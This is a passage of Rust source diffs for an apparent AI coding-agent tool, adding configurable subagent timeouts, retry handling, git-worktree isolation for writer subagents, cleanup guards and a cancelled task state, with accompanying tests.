+            let rooted_worktree_for_task = rooted_worktree.clone();
 
-            const SUBAGENT_TIMEOUT: std::time::Duration = std::time::Duration::from_secs(600);
+            let route_timeout = timeout;
             let store_for_task = store.clone();
             let handle = tokio::spawn(async move {
                 let child_sid = format!("sub-{}", crate::agent::runner::uuid_v4_simple());
@@ -700,14 +883,44 @@ impl TaskTool {
                     .as_deref()
                     .unwrap_or(SUBAGENT_DEFAULT_PREAMBLE)
                     .to_string();
-                let runner = agent.spawn_subagent_runner(
-                    prompt.clone(),
-                    system_prompt,
-                    &allowed_for_task,
-                    &child_sid,
-                    max_turns,
-                    model_for_task.as_ref(),
-                );
+                let runner = if let Some((worktree, main_git_dir)) = rooted_worktree_for_task {
+                    let root = match crate::agent::tools::ToolRoot::new(&worktree) {
+                        Ok(root) => root,
+                        Err(error) => {
+                            store_for_task
+                                .notify(&tid_for_task, TaskState::Failed(error.to_string()));
+                            return;
+                        }
+                    };
+                    let tools = crate::agent::builder::build_rooted_writer_tools(
+                        root,
+                        permission_for_task,
+                        ask_tx_for_task,
+                        sandbox_for_task,
+                        crate::sandbox::SandboxExecutionRoot {
+                            worktree,
+                            main_git_dir,
+                        },
+                    )
+                    .await;
+                    agent.spawn_subagent_runner_with_tools(
+                        prompt.clone(),
+                        system_prompt,
+                        tools,
+                        &child_sid,
+                        max_turns,
+                        model_for_task.as_ref(),
+                    )
+                } else {
+                    agent.spawn_subagent_runner(
+                        prompt.clone(),
+                        system_prompt,
+                        &allowed_for_task,
+                        &child_sid,
+                        max_turns,
+                        model_for_task.as_ref(),
+                    )
+                };
                 let abort_watcher = spawn_abort_watcher(
                     abort_for_task.clone(),
                     runner.task.abort_handle(),
@@ -723,7 +936,7 @@ impl TaskTool {
                     }
                 };
                 let drained = drain_subagent_runner(runner, &tid_for_task, emit);
-                let outer = tokio::time::timeout(SUBAGENT_TIMEOUT, drained).await;
+                let outer = tokio::time::timeout(route_timeout, drained).await;
                 let aborted = abort_for_task.is_cancelled();
                 let (state, chat_event) = match outer {
                     Ok(Ok(text)) => (TaskState::Completed(text), None),
@@ -747,8 +960,7 @@ impl TaskTool {
                         }
                     }
                     Err(_) => {
-                        let msg =
-                            format!("subagent timed out after {}s", SUBAGENT_TIMEOUT.as_secs());
+                        let msg = format!("subagent timed out after {}s", route_timeout.as_secs());
                         (
                             TaskState::Failed(msg.clone()),
                             Some(SubagentChatEvent::Failed {
@@ -807,15 +1019,19 @@ impl TaskTool {
 
             let _cleanup = SubagentCleanup::new(task_id.clone(), abort_watcher);
 
-            let result = drain_subagent_runner(runner, &task_id, |ev| self.emit_chat(ev)).await;
+            let result = tokio::time::timeout(
+                timeout,
+                drain_subagent_runner(runner, &task_id, |ev| self.emit_chat(ev)),
+            )
+            .await;
             let aborted = abort.is_cancelled();
             match result {
-                Ok(text) => {
+                Ok(Ok(text)) => {
                     let outcome =
                         crate::agent::tools::output_relay::relay_if_large("task", text, "");
                     Ok(outcome.text)
                 }
-                Err(e) => {
+                Ok(Err(e)) => {
                     if aborted {
                         self.emit_chat(SubagentChatEvent::Aborted { id: task_id });
                         Err(ToolError::Msg("Subagent aborted by user".to_string()))
@@ -826,6 +1042,14 @@ impl TaskTool {
                         });
                         Err(ToolError::Msg(format!("Subagent error: {e}")))
                     }
+                }
+                Err(_) => {
+                    let message = format!("Subagent timed out after {}s", timeout.as_secs());
+                    self.emit_chat(SubagentChatEvent::Failed {
+                        id: task_id,
+                        error: message.clone(),
+                    });
+                    Err(ToolError::Msg(message))
                 }
             }
         }
@@ -842,6 +1066,8 @@ pub struct Args {
     /// or `config.json` `agents`). Omit for the default subagent.
     #[serde(default)]
     pub agent: Option<String>,
+    #[serde(default)]
+    pub retry_of: Option<String>,
 }
 
 impl Tool for TaskTool {
@@ -865,6 +1091,10 @@ impl Tool for TaskTool {
                 "background": {
                     "type": "boolean",
                     "description": "Run asynchronously (default: false). When true, returns a task_id immediately. The result is delivered automatically as a <system-reminder> on your next turn — do NOT poll task_status."
+                },
+                "retry_of": {
+                    "type": "string",
+                    "description": "Coordinator-only: retry one failed background task once."
                 }
             },
             "required": ["prompt"]
@@ -939,8 +1169,18 @@ impl Tool for TaskTool {
         // the model asked for a specific persona). `tool_allow` is `Some`
         // when the profile opted its subagent into tools (v1: readonly tier);
         // that selects the tooled fork below instead of the tool-less one-shot.
-        let (route_model, route_preamble, tool_allow, max_turns) = match args.agent.as_deref() {
-            None => (None, None, None, SUBAGENT_DEFAULT_MAX_TURNS),
+        let (route_model, route_preamble, tool_allow, max_turns, timeout, tier) = match args
+            .agent
+            .as_deref()
+        {
+            None => (
+                None,
+                None,
+                None,
+                SUBAGENT_DEFAULT_MAX_TURNS,
+                std::time::Duration::from_secs(600),
+                crate::context::agent_defs::SubagentToolTier::Toolless,
+            ),
             Some(name) => {
                 if !subagent_routes_available() {
                     return Err(ToolError::Msg(format!(
@@ -949,7 +1189,14 @@ impl Tool for TaskTool {
                     )));
                 }
                 match subagent_route(name) {
-                    Some(r) => (r.model, r.preamble, r.tool_allow, r.max_turns),
+                    Some(r) => (
+                        r.model,
+                        r.preamble,
+                        r.tool_allow,
+                        r.max_turns,
+                        r.timeout,
+                        r.tier,
+                    ),
                     None => {
                         return Err(ToolError::Msg(format!(
                             "unknown agent profile '{}'. Available: {}.",
@@ -961,6 +1208,25 @@ impl Tool for TaskTool {
             }
         };
 
+        let background = args.background.unwrap_or(false);
+        let is_writer = matches!(
+            tier,
+            crate::context::agent_defs::SubagentToolTier::ReadWrite
+        );
+        if args.retry_of.is_some() && !background {
+            return Err(ToolError::Msg("retry_of requires background=true".into()));
+        }
+        if self.bg_store.coordinator_strategy()
+            == Some(crate::config::SubagentDispatchStrategy::Full)
+            && !background
+            && !matches!(tier, crate::context::agent_defs::SubagentToolTier::Toolless)
+        {
+            return Err(ToolError::Msg(
+                "full coordinator mode requires tier-routed subagents to use background=true"
+                    .into(),
+            ));
+        }
+
         // Tooled subagent (v1 readonly tier): fork a filtered runner off the
         // live agent. Everything below this branch is the unchanged tool-less
         // `btw_query` path, so the dirge-mifq regression stays green.
@@ -971,7 +1237,10 @@ impl Tool for TaskTool {
                     route_preamble,
                     allowed,
                     max_turns,
-                    args.background.unwrap_or(false),
+                    timeout,
+                    background,
+                    is_writer,
+                    args.retry_of,
                     args.prompt,
                     args.agent,
                 )
@@ -997,7 +1266,18 @@ impl Tool for TaskTool {
                 )));
             }
             let task_id = Uuid::new_v4().to_string();
-            self.bg_store.insert(task_id.clone());
+            if self.bg_store.coordinator_strategy().is_some() {
+                self.bg_store
+                    .insert_coordinator_dispatch(
+                        task_id.clone(),
+                        args.prompt.clone(),
+                        is_writer,
+                        args.retry_of.as_deref(),
+                    )
+                    .map_err(ToolError::Msg)?;
+            } else {
+                self.bg_store.insert_for_dispatch(task_id.clone());
+            }
             self.bg_store.notify_started(&task_id);
 
             // dirge-ov2 Phase D: announce the subagent so the UI
@@ -1022,15 +1302,7 @@ impl Tool for TaskTool {
             let abort_for_task = abort.clone();
             let preamble_for_task = route_preamble.clone();
 
-            // Cap the background subagent at 10 minutes. Without a
-            // timeout, a stuck subagent (provider hang, runaway
-            // multi-turn) would keep the task in `Running` state
-            // forever, hold its model/network handle open, and
-            // never deliver a system-reminder to the next turn.
-            // 10 min matches the rough upper bound for a coherent
-            // single-prompt LLM task; anything longer is the
-            // subagent loop misbehaving.
-            const SUBAGENT_TIMEOUT: std::time::Duration = std::time::Duration::from_secs(600);
+            let route_timeout = timeout;
             let store_for_task = store.clone();
             let tid_for_task = tid.clone();
             let handle = tokio::spawn(async move {
@@ -1059,7 +1331,7 @@ impl Tool for TaskTool {
                         }
                     }
                 };
-                let outer = tokio::time::timeout(SUBAGENT_TIMEOUT, raced).await;
+                let outer = tokio::time::timeout(route_timeout, raced).await;
                 let (state, chat_event) = match outer {
                     Ok(Ok(Ok(text))) => (
                         TaskState::Completed(text.clone()),
@@ -1089,8 +1361,7 @@ impl Tool for TaskTool {
                         )
                     }
                     Err(_) => {
-                        let msg =
-                            format!("subagent timed out after {}s", SUBAGENT_TIMEOUT.as_secs(),);
+                        let msg = format!("subagent timed out after {}s", route_timeout.as_secs(),);
                         (
                             TaskState::Failed(msg.clone()),
                             SubagentChatEvent::Failed {
@@ -1245,7 +1516,30 @@ mod tests {
             None,
             AnyModel::OpenRouter(model),
             BackgroundStore::new(),
+            Sandbox::new(crate::sandbox::SandboxMode::Off),
+            SubagentWriteIsolation::Serialize,
         )
+    }
+
+    #[test]
+    fn writer_worktree_policy_respects_mode_and_sandbox() {
+        assert_eq!(
+            writer_worktree_enabled(false, SubagentWriteIsolation::Worktree, false),
+            Ok(false)
+        );
+        assert_eq!(
+            writer_worktree_enabled(true, SubagentWriteIsolation::Serialize, false),
+            Ok(false)
+        );
+        assert_eq!(
+            writer_worktree_enabled(true, SubagentWriteIsolation::Auto, false),
+            Ok(true)
+        );
+        assert_eq!(
+            writer_worktree_enabled(true, SubagentWriteIsolation::Auto, true),
+            Ok(false)
+        );
+        assert!(writer_worktree_enabled(true, SubagentWriteIsolation::Worktree, true).is_err());
     }
 
     #[test]
@@ -1435,6 +1729,7 @@ mod tests {
                 allow: leaky.iter().map(|s| s.to_string()).collect(), // try to smuggle
                 deny: Vec::new(),
                 max_turns: None,
+                timeout_secs: None,
             };
             let resolved = resolve_subagent_allow(&policy)
                 .unwrap_or_else(|| panic!("{tier:?} should yield a tool set"));
@@ -1719,6 +2014,8 @@ mod tests {
                 preamble: Some("You are a reviewer.".to_string()),
                 tool_allow: None,
                 max_turns: SUBAGENT_DEFAULT_MAX_TURNS,
+                timeout: std::time::Duration::from_secs(600),
+                tier: crate::context::agent_defs::SubagentToolTier::Toolless,
             },
         );
         set_subagent_routes(routes);

--- a/src/agent/tools/task.rs
+++ b/src/agent/tools/task.rs
@@ -962,24 +962,28 @@ impl TaskTool {
                         Ok(root) => root,
                         Err(error) => {
                             let state = TaskState::Failed(error.to_string());
-                            let commits = crate::extras::git_worktree::worktree_commits_since(
-                                info,
-                                base_commit,
-                            )
-                            .unwrap_or_default();
-                            let dirty = crate::extras::git_worktree::worktree_is_dirty(info)
-                                .unwrap_or(true);
-                            let retained = dirty || !commits.is_empty();
-                            if !retained {
-                                let _ = crate::extras::git_worktree::remove_worktree_if_clean(info);
+                            #[cfg(feature = "git-worktree")]
+                            {
+                                let commits = crate::extras::git_worktree::worktree_commits_since(
+                                    info,
+                                    base_commit,
+                                )
+                                .unwrap_or_default();
+                                let dirty = crate::extras::git_worktree::worktree_is_dirty(info)
+                                    .unwrap_or(true);
+                                let retained = dirty || !commits.is_empty();
+                                if !retained {
+                                    let _ =
+                                        crate::extras::git_worktree::remove_worktree_if_clean(info);
+                                }
+                                store_for_task.set_coordinator_dispatch_worktree_outcome(
+                                    &tid_for_task,
+                                    commits,
+                                    dirty,
+                                    retained,
+                                );
+                                store_for_task.unregister_writer_worktree(&tid_for_task);
                             }
-                            store_for_task.set_coordinator_dispatch_worktree_outcome(
-                                &tid_for_task,
-                                commits,
-                                dirty,
-                                retained,
-                            );
-                            store_for_task.unregister_writer_worktree(&tid_for_task);
                             store_for_task.notify(&tid_for_task, state);
                             return;
                         }

--- a/src/agent/tools/task.rs
+++ b/src/agent/tools/task.rs
@@ -840,14 +840,26 @@ impl TaskTool {
                     match create_writer_worktree(&task_id) {
                         Ok(info) => {
                             let main_git_dir = info.main_repo_path.join(".git");
-                            let base_commit =
-                                crate::extras::git_worktree::head_commit(&info.main_repo_path)
-                                    .map_err(ToolError::Msg)?;
+                            let base_commit = match crate::extras::git_worktree::head_commit(
+                                &info.main_repo_path,
+                            ) {
+                                Ok(commit) => commit,
+                                Err(error) => {
+                                    let _ = crate::extras::git_worktree::remove_worktree_if_clean(
+                                        &info,
+                                    );
+                                    self.bg_store
+                                        .notify(&task_id, TaskState::Failed(error.clone()));
+                                    return Err(ToolError::Msg(error));
+                                }
+                            };
                             if let Err(error) = self.bg_store.set_coordinator_dispatch_worktree(
                                 &task_id,
                                 info.branch.clone(),
                                 info.worktree_path.display().to_string(),
                             ) {
+                                let _ =
+                                    crate::extras::git_worktree::remove_worktree_if_clean(&info);
                                 self.bg_store
                                     .notify(&task_id, TaskState::Failed(error.clone()));
                                 return Err(ToolError::Msg(error));
@@ -857,6 +869,10 @@ impl TaskTool {
                             Some((info, main_git_dir, base_commit))
                         }
                         Err(_) if self.write_isolation == SubagentWriteIsolation::Auto => {
+                            tracing::warn!(
+                                task_id = %task_id,
+                                "worktree writer isolation unavailable; falling back to serialized parent checkout"
+                            );
                             if let Err(error) = self
                                 .bg_store
                                 .set_coordinator_dispatch_isolated(&task_id, false)
@@ -876,6 +892,10 @@ impl TaskTool {
                     #[cfg(not(feature = "git-worktree"))]
                     {
                         if self.write_isolation == SubagentWriteIsolation::Auto {
+                            tracing::warn!(
+                                task_id = %task_id,
+                                "git-worktree support is unavailable; falling back to serialized parent checkout"
+                            );
                             if let Err(error) = self
                                 .bg_store
                                 .set_coordinator_dispatch_isolated(&task_id, false)
@@ -934,46 +954,65 @@ impl TaskTool {
                         .unwrap_or(SUBAGENT_DEFAULT_PREAMBLE)
                         .to_string()
                 };
-                let runner =
-                    if let Some((info, main_git_dir, _)) = rooted_worktree_for_task.as_ref() {
-                        let worktree = info.worktree_path.clone();
-                        let root = match crate::agent::tools::ToolRoot::new(&worktree) {
-                            Ok(root) => root,
-                            Err(error) => {
-                                store_for_task
-                                    .notify(&tid_for_task, TaskState::Failed(error.to_string()));
-                                return;
+                let runner = if let Some((info, main_git_dir, base_commit)) =
+                    rooted_worktree_for_task.as_ref()
+                {
+                    let worktree = info.worktree_path.clone();
+                    let root = match crate::agent::tools::ToolRoot::new(&worktree) {
+                        Ok(root) => root,
+                        Err(error) => {
+                            let state = TaskState::Failed(error.to_string());
+                            let commits = crate::extras::git_worktree::worktree_commits_since(
+                                info,
+                                base_commit,
+                            )
+                            .unwrap_or_default();
+                            let dirty = crate::extras::git_worktree::worktree_is_dirty(info)
+                                .unwrap_or(true);
+                            let retained = dirty || !commits.is_empty();
+                            if !retained {
+                                let _ = crate::extras::git_worktree::remove_worktree_if_clean(info);
                             }
-                        };
-                        let tools = crate::agent::builder::build_rooted_writer_tools(
-                            root,
-                            permission_for_task,
-                            ask_tx_for_task,
-                            sandbox_for_task,
-                            crate::sandbox::SandboxExecutionRoot {
-                                worktree,
-                                main_git_dir: main_git_dir.clone(),
-                            },
-                        )
-                        .await;
-                        agent.spawn_subagent_runner_with_tools(
-                            prompt.clone(),
-                            system_prompt,
-                            tools,
-                            &child_sid,
-                            max_turns,
-                            model_for_task.as_ref(),
-                        )
-                    } else {
-                        agent.spawn_subagent_runner(
-                            prompt.clone(),
-                            system_prompt,
-                            &allowed_for_task,
-                            &child_sid,
-                            max_turns,
-                            model_for_task.as_ref(),
-                        )
+                            store_for_task.set_coordinator_dispatch_worktree_outcome(
+                                &tid_for_task,
+                                commits,
+                                dirty,
+                                retained,
+                            );
+                            store_for_task.unregister_writer_worktree(&tid_for_task);
+                            store_for_task.notify(&tid_for_task, state);
+                            return;
+                        }
                     };
+                    let tools = crate::agent::builder::build_rooted_writer_tools(
+                        root,
+                        permission_for_task,
+                        ask_tx_for_task,
+                        sandbox_for_task,
+                        crate::sandbox::SandboxExecutionRoot {
+                            worktree,
+                            main_git_dir: main_git_dir.clone(),
+                        },
+                    )
+                    .await;
+                    agent.spawn_subagent_runner_with_tools(
+                        prompt.clone(),
+                        system_prompt,
+                        tools,
+                        &child_sid,
+                        max_turns,
+                        model_for_task.as_ref(),
+                    )
+                } else {
+                    agent.spawn_subagent_runner(
+                        prompt.clone(),
+                        system_prompt,
+                        &allowed_for_task,
+                        &child_sid,
+                        max_turns,
+                        model_for_task.as_ref(),
+                    )
+                };
                 let abort_watcher = spawn_abort_watcher(
                     abort_for_task.clone(),
                     runner.task.abort_handle(),
@@ -997,7 +1036,7 @@ impl TaskTool {
                         let aborted_msg = "aborted by user".to_string();
                         if aborted {
                             (
-                                TaskState::Failed(aborted_msg.clone()),
+                                TaskState::Cancelled(aborted_msg.clone()),
                                 Some(SubagentChatEvent::Aborted {
                                     id: tid_for_task.clone(),
                                 }),
@@ -1433,7 +1472,7 @@ impl Tool for TaskTool {
                         // dirge-781c: aborted via /kill.
                         let msg = "aborted by user".to_string();
                         (
-                            TaskState::Failed(msg.clone()),
+                            TaskState::Cancelled(msg.clone()),
                             SubagentChatEvent::Aborted {
                                 id: tid_for_task.clone(),
                             },

--- a/src/agent/tools/task.rs
+++ b/src/agent/tools/task.rs
@@ -24,6 +24,18 @@ use crate::config::SubagentWriteIsolation;
 use crate::provider::AnyModel;
 use crate::sandbox::Sandbox;
 
+#[cfg(feature = "git-worktree")]
+type WriterWorktree = crate::extras::git_worktree::WorktreeInfo;
+
+#[cfg(not(feature = "git-worktree"))]
+#[allow(dead_code)]
+#[derive(Clone)]
+struct WriterWorktree {
+    branch: String,
+    worktree_path: std::path::PathBuf,
+    main_repo_path: std::path::PathBuf,
+}
+
 fn writer_worktree_enabled(
     is_writer: bool,
     isolation: SubagentWriteIsolation,
@@ -335,6 +347,22 @@ pub const SUBAGENT_DEFAULT_MAX_TURNS: usize = 25;
 /// path has a real system-prompt slot, so the subagent identity lives here
 /// and the task is the user message.
 const SUBAGENT_DEFAULT_PREAMBLE: &str = "You are a subagent working on a specific subtask. Complete it thoroughly using the tools available to you. You cannot spawn further subagents.";
+
+fn writer_preamble(
+    route_preamble: Option<&str>,
+    worktree: &std::path::Path,
+    branch: &str,
+) -> String {
+    let mut preamble = route_preamble
+        .unwrap_or(SUBAGENT_DEFAULT_PREAMBLE)
+        .to_string();
+    preamble.push_str(&format!(
+        "\n\nYou are an isolated writer. Your root is {} on branch {}. Do not modify the parent checkout. Inspect git status, stage intended changes, make one descriptive commit, and report the commit hash, changed files, tests run, and unresolved issues.",
+        worktree.display(),
+        branch,
+    ));
+    preamble
+}
 
 /// Resolve a profile's subagent policy into the exact allow-list for the
 /// tooled fork.
@@ -782,12 +810,20 @@ impl TaskTool {
             }
             let task_id = Uuid::new_v4().to_string();
             let coordinator_dispatch = self.bg_store.coordinator_strategy().is_some();
+            let attempts_isolated_writer = coordinator_dispatch
+                && writer_worktree_enabled(
+                    is_writer,
+                    self.write_isolation,
+                    self.sandbox.is_microvm(),
+                )
+                .map_err(|error| ToolError::Msg(error.to_string()))?;
             if coordinator_dispatch {
                 self.bg_store
                     .insert_coordinator_dispatch(
                         task_id.clone(),
                         prompt.clone(),
                         is_writer,
+                        attempts_isolated_writer,
                         retry_of.as_deref(),
                     )
                     .map_err(ToolError::Msg)?;
@@ -798,62 +834,69 @@ impl TaskTool {
             // Coordinator ReadWrite agents may be rooted in a dedicated
             // worktree. Auto preserves serialization when any prerequisite is
             // unavailable; explicit Worktree reports that failure.
-            let rooted_worktree = if coordinator_dispatch {
-                match writer_worktree_enabled(
-                    is_writer,
-                    self.write_isolation,
-                    self.sandbox.is_microvm(),
-                ) {
-                    Ok(false) => None,
-                    Ok(true) => {
-                        #[cfg(feature = "git-worktree")]
-                        match create_writer_worktree(&task_id) {
-                            Ok(info) => {
-                                let main_git_dir = info.main_repo_path.join(".git");
-                                if let Err(error) = self.bg_store.set_coordinator_dispatch_worktree(
-                                    &task_id,
-                                    info.branch,
-                                    info.worktree_path.display().to_string(),
-                                ) {
-                                    self.bg_store
-                                        .notify(&task_id, TaskState::Failed(error.clone()));
-                                    return Err(ToolError::Msg(error));
-                                }
-                                Some((info.worktree_path, main_git_dir))
-                            }
-                            Err(error) if self.write_isolation == SubagentWriteIsolation::Auto => {
-                                None
-                            }
-                            Err(error) => {
+            let rooted_worktree: Option<(WriterWorktree, std::path::PathBuf, String)> =
+                if attempts_isolated_writer {
+                    #[cfg(feature = "git-worktree")]
+                    match create_writer_worktree(&task_id) {
+                        Ok(info) => {
+                            let main_git_dir = info.main_repo_path.join(".git");
+                            let base_commit =
+                                crate::extras::git_worktree::head_commit(&info.main_repo_path)
+                                    .map_err(ToolError::Msg)?;
+                            if let Err(error) = self.bg_store.set_coordinator_dispatch_worktree(
+                                &task_id,
+                                info.branch.clone(),
+                                info.worktree_path.display().to_string(),
+                            ) {
                                 self.bg_store
                                     .notify(&task_id, TaskState::Failed(error.clone()));
                                 return Err(ToolError::Msg(error));
                             }
+                            self.bg_store
+                                .register_writer_worktree(task_id.clone(), info.clone());
+                            Some((info, main_git_dir, base_commit))
                         }
-                        #[cfg(not(feature = "git-worktree"))]
-                        {
-                            if self.write_isolation == SubagentWriteIsolation::Auto {
-                                None
-                            } else {
-                                let error =
-                                    "worktree write isolation requires the git-worktree feature"
-                                        .to_string();
+                        Err(_) if self.write_isolation == SubagentWriteIsolation::Auto => {
+                            if let Err(error) = self
+                                .bg_store
+                                .set_coordinator_dispatch_isolated(&task_id, false)
+                            {
                                 self.bg_store
                                     .notify(&task_id, TaskState::Failed(error.clone()));
                                 return Err(ToolError::Msg(error));
                             }
+                            None
+                        }
+                        Err(error) => {
+                            self.bg_store
+                                .notify(&task_id, TaskState::Failed(error.clone()));
+                            return Err(ToolError::Msg(error));
                         }
                     }
-                    Err(error) => {
-                        let error = error.to_string();
-                        self.bg_store
-                            .notify(&task_id, TaskState::Failed(error.clone()));
-                        return Err(ToolError::Msg(error));
+                    #[cfg(not(feature = "git-worktree"))]
+                    {
+                        if self.write_isolation == SubagentWriteIsolation::Auto {
+                            if let Err(error) = self
+                                .bg_store
+                                .set_coordinator_dispatch_isolated(&task_id, false)
+                            {
+                                self.bg_store
+                                    .notify(&task_id, TaskState::Failed(error.clone()));
+                                return Err(ToolError::Msg(error));
+                            }
+                            None
+                        } else {
+                            let error =
+                                "worktree write isolation requires the git-worktree feature"
+                                    .to_string();
+                            self.bg_store
+                                .notify(&task_id, TaskState::Failed(error.clone()));
+                            return Err(ToolError::Msg(error));
+                        }
                     }
-                }
-            } else {
-                None
-            };
+                } else {
+                    None
+                };
             self.bg_store.notify_started(&task_id);
             self.emit_chat(SubagentChatEvent::Spawn {
                 id: task_id.clone(),
@@ -879,48 +922,58 @@ impl TaskTool {
             let store_for_task = store.clone();
             let handle = tokio::spawn(async move {
                 let child_sid = format!("sub-{}", crate::agent::runner::uuid_v4_simple());
-                let system_prompt = preamble_for_task
-                    .as_deref()
-                    .unwrap_or(SUBAGENT_DEFAULT_PREAMBLE)
-                    .to_string();
-                let runner = if let Some((worktree, main_git_dir)) = rooted_worktree_for_task {
-                    let root = match crate::agent::tools::ToolRoot::new(&worktree) {
-                        Ok(root) => root,
-                        Err(error) => {
-                            store_for_task
-                                .notify(&tid_for_task, TaskState::Failed(error.to_string()));
-                            return;
-                        }
-                    };
-                    let tools = crate::agent::builder::build_rooted_writer_tools(
-                        root,
-                        permission_for_task,
-                        ask_tx_for_task,
-                        sandbox_for_task,
-                        crate::sandbox::SandboxExecutionRoot {
-                            worktree,
-                            main_git_dir,
-                        },
-                    )
-                    .await;
-                    agent.spawn_subagent_runner_with_tools(
-                        prompt.clone(),
-                        system_prompt,
-                        tools,
-                        &child_sid,
-                        max_turns,
-                        model_for_task.as_ref(),
+                let system_prompt = if let Some((info, _, _)) = rooted_worktree_for_task.as_ref() {
+                    writer_preamble(
+                        preamble_for_task.as_deref(),
+                        &info.worktree_path,
+                        &info.branch,
                     )
                 } else {
-                    agent.spawn_subagent_runner(
-                        prompt.clone(),
-                        system_prompt,
-                        &allowed_for_task,
-                        &child_sid,
-                        max_turns,
-                        model_for_task.as_ref(),
-                    )
+                    preamble_for_task
+                        .as_deref()
+                        .unwrap_or(SUBAGENT_DEFAULT_PREAMBLE)
+                        .to_string()
                 };
+                let runner =
+                    if let Some((info, main_git_dir, _)) = rooted_worktree_for_task.as_ref() {
+                        let worktree = info.worktree_path.clone();
+                        let root = match crate::agent::tools::ToolRoot::new(&worktree) {
+                            Ok(root) => root,
+                            Err(error) => {
+                                store_for_task
+                                    .notify(&tid_for_task, TaskState::Failed(error.to_string()));
+                                return;
+                            }
+                        };
+                        let tools = crate::agent::builder::build_rooted_writer_tools(
+                            root,
+                            permission_for_task,
+                            ask_tx_for_task,
+                            sandbox_for_task,
+                            crate::sandbox::SandboxExecutionRoot {
+                                worktree,
+                                main_git_dir: main_git_dir.clone(),
+                            },
+                        )
+                        .await;
+                        agent.spawn_subagent_runner_with_tools(
+                            prompt.clone(),
+                            system_prompt,
+                            tools,
+                            &child_sid,
+                            max_turns,
+                            model_for_task.as_ref(),
+                        )
+                    } else {
+                        agent.spawn_subagent_runner(
+                            prompt.clone(),
+                            system_prompt,
+                            &allowed_for_task,
+                            &child_sid,
+                            max_turns,
+                            model_for_task.as_ref(),
+                        )
+                    };
                 let abort_watcher = spawn_abort_watcher(
                     abort_for_task.clone(),
                     runner.task.abort_handle(),
@@ -976,6 +1029,25 @@ impl TaskTool {
                     } else if let Some(sink) = subagent_chat_sink() {
                         let _ = sink.try_send(chat_event);
                     }
+                }
+                #[cfg(feature = "git-worktree")]
+                if let Some((info, _, base_commit)) = rooted_worktree_for_task.as_ref() {
+                    let commits =
+                        crate::extras::git_worktree::worktree_commits_since(info, base_commit)
+                            .unwrap_or_default();
+                    let dirty =
+                        crate::extras::git_worktree::worktree_is_dirty(info).unwrap_or(true);
+                    let retained = dirty || !commits.is_empty();
+                    if !retained {
+                        let _ = crate::extras::git_worktree::remove_worktree_if_clean(info);
+                    }
+                    store_for_task.set_coordinator_dispatch_worktree_outcome(
+                        &tid_for_task,
+                        commits,
+                        dirty,
+                        retained,
+                    );
+                    store_for_task.unregister_writer_worktree(&tid_for_task);
                 }
                 store_for_task.notify(&tid_for_task, state);
             });
@@ -1216,6 +1288,12 @@ impl Tool for TaskTool {
         if args.retry_of.is_some() && !background {
             return Err(ToolError::Msg("retry_of requires background=true".into()));
         }
+        if self.bg_store.coordinator_strategy().is_some() && !background && is_writer {
+            return Err(ToolError::Msg(
+                "coordinator writer subagents require background=true so writer isolation can be enforced"
+                    .into(),
+            ));
+        }
         if self.bg_store.coordinator_strategy()
             == Some(crate::config::SubagentDispatchStrategy::Full)
             && !background
@@ -1272,6 +1350,7 @@ impl Tool for TaskTool {
                         task_id.clone(),
                         args.prompt.clone(),
                         is_writer,
+                        false,
                         args.retry_of.as_deref(),
                     )
                     .map_err(ToolError::Msg)?;
@@ -1519,6 +1598,19 @@ mod tests {
             Sandbox::new(crate::sandbox::SandboxMode::Off),
             SubagentWriteIsolation::Serialize,
         )
+    }
+
+    #[test]
+    fn isolated_writer_preamble_requires_commit_and_report() {
+        let preamble = writer_preamble(
+            None,
+            std::path::Path::new("/tmp/dirge-task-writer"),
+            "dirge-task-writer",
+        );
+        assert!(preamble.contains("stage intended changes"));
+        assert!(preamble.contains("one descriptive commit"));
+        assert!(preamble.contains("commit hash"));
+        assert!(preamble.contains("/tmp/dirge-task-writer"));
     }
 
     #[test]

--- a/src/agent/tools/task.rs
+++ b/src/agent/tools/task.rs
@@ -243,6 +243,10 @@ fn spawn_abort_watcher(
 struct SubagentCleanup {
     id: String,
     watcher: Option<tokio::task::JoinHandle<()>>,
+    /// When set, `Drop` calls `notify_if_running` with a Failed state so a
+    /// panic / early-return in the spawned closure doesn't leave the task
+    /// stuck Running forever (which would stall the coordinator batch barrier).
+    store: Option<BackgroundStore>,
 }
 
 impl SubagentCleanup {
@@ -250,6 +254,30 @@ impl SubagentCleanup {
         Self {
             id,
             watcher: Some(watcher),
+            store: None,
+        }
+    }
+
+    fn with_store(
+        id: String,
+        watcher: tokio::task::JoinHandle<()>,
+        store: BackgroundStore,
+    ) -> Self {
+        Self {
+            id,
+            watcher: Some(watcher),
+            store: Some(store),
+        }
+    }
+
+    /// Drop-guard for a spawned closure that has no abort-watcher.
+    /// Only carries the store so `Drop` can call `notify_if_running`
+    /// on a panic / early-return.
+    fn from_store(id: String, store: BackgroundStore) -> Self {
+        Self {
+            id,
+            watcher: None,
+            store: Some(store),
         }
     }
 }
@@ -260,6 +288,12 @@ impl Drop for SubagentCleanup {
             watcher.abort();
         }
         unregister_subagent_abort(&self.id);
+        if let Some(store) = &self.store {
+            store.notify_if_running(
+                &self.id,
+                TaskState::Failed("subagent exited without producing a result".into()),
+            );
+        }
     }
 }
 
@@ -1022,7 +1056,11 @@ impl TaskTool {
                     runner.task.abort_handle(),
                     runner.cancel_tx.clone(),
                 );
-                let _cleanup = SubagentCleanup::new(tid_for_task.clone(), abort_watcher);
+                let _cleanup = SubagentCleanup::with_store(
+                    tid_for_task.clone(),
+                    abort_watcher,
+                    store_for_task.clone(),
+                );
                 let chat_sink_drain = chat_sink.clone();
                 let emit = move |ev: SubagentChatEvent| {
                     if let Some(sink) = &chat_sink_drain {
@@ -1428,6 +1466,8 @@ impl Tool for TaskTool {
             let store_for_task = store.clone();
             let tid_for_task = tid.clone();
             let handle = tokio::spawn(async move {
+                let _cleanup =
+                    SubagentCleanup::from_store(tid_for_task.clone(), store_for_task.clone());
                 let fut = model.btw_query_with(
                     format!(
                         "You are a subagent working on a specific subtask. Complete it thoroughly.\n\nTask: {}",

--- a/src/agent/tools/task_status.rs
+++ b/src/agent/tools/task_status.rs
@@ -127,6 +127,12 @@ impl Tool for TaskStatusTool {
                                 args.task_id, err
                             ));
                         }
+                        TaskState::Cancelled(reason) => {
+                            return Ok(format!(
+                                "task_id: {}\nstate: cancelled\n\nreason: {}",
+                                args.task_id, reason
+                            ));
+                        }
                     },
                     None => {
                         return Err(ToolError::Msg(format!(
@@ -147,6 +153,10 @@ impl Tool for TaskStatusTool {
                     TaskState::Failed(err) => Ok(format!(
                         "task_id: {}\nstate: failed\n\nerror: {}",
                         args.task_id, err
+                    )),
+                    TaskState::Cancelled(reason) => Ok(format!(
